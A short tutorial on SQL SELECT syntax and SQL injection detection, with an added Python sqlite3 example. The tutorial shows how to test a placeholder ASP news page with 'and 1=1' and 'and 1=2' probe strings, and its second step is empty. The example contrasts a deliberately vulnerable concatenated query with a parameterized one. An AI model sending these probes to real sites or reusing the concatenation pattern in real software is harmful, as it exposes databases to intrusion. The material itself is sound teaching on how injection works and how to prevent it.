SQL statements:
select * from XXX; # show all records in table XXX
select * from XXX where id=1; # find the records in table XXX that satisfy id=1
select username,password from XXX where id=1 # find the records in table XXX that satisfy id=1 and show only the username and password fields
select * from XXX where id=1 and username="admin" # find the records in table XXX where id=1 and username="admin"
select * from XXX where id=1 or username="admin" # find in table XXX where id=1 or username
SQL injection:
http://www.xxxx.com/news.asp?id=4
select * from news where id=16
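1. Check whether an injection point exists: if http://www.xxxx.com/news.asp?id=4 and 1=1 returns a page no different from before, while http://www.xxxx.com/news.asp?id=4 and 1=2 returns an error page, the site has an injection point.
2.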
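Why the `and 1=1` / `and 1=2` comparison in step 1 works, and what removes it, shown as an added example that is not part of the original notes. It assumes Python's `sqlite3` in place of the ASP page and a constructed `news` table; the function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the page's `news` table.
    db = sqlite3.connect(":memory:")
    db.execute("create table news (id integer primary key, title text)")
    db.executemany("insert into news values (?, ?)",
                   [(4, "article four"), (16, "article sixteen")])
    return db

def fetch_concatenated(db, raw_id):
    # Vulnerable pattern: the id parameter is pasted into the SQL text,
    # so "4 and 1=2" becomes part of the WHERE clause.
    sql = "select * from news where id=" + raw_id
    return db.execute(sql).fetchall()

def fetch_parameterized(db, raw_id):
    # Hardened pattern: reject anything that is not a plain integer,
    # then bind the value so it can never be parsed as SQL.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a non-negative integer")
    return db.execute("select * from news where id=?",
                      (int(raw_id),)).fetchall()

def probe(fetch, db):
    # Send the page's three id values and record what each returns.
    # If "and 1=1" matches the baseline while "and 1=2" differs,
    # the parameter reached the SQL parser.
    results = {}
    for raw_id in ("4", "4 and 1=1", "4 and 1=2"):
        try:
            results[raw_id] = fetch(db, raw_id)
        except ValueError:
            results[raw_id] = "rejected"
    return results

if __name__ == "__main__":
    db = make_db()
    for name, fetch in (("concatenated", fetch_concatenated),
                        ("parameterized", fetch_parameterized)):
        print(name)
        for raw_id, rows in probe(fetch, db).items():
            print("  id=%-10s -> %r" % (raw_id, rows))
```

With the concatenated query the three requests return a row, the same row, and nothing; with the parameterized query both appended conditions are rejected, so the page no longer behaves differently for `1=1` and `1=2`.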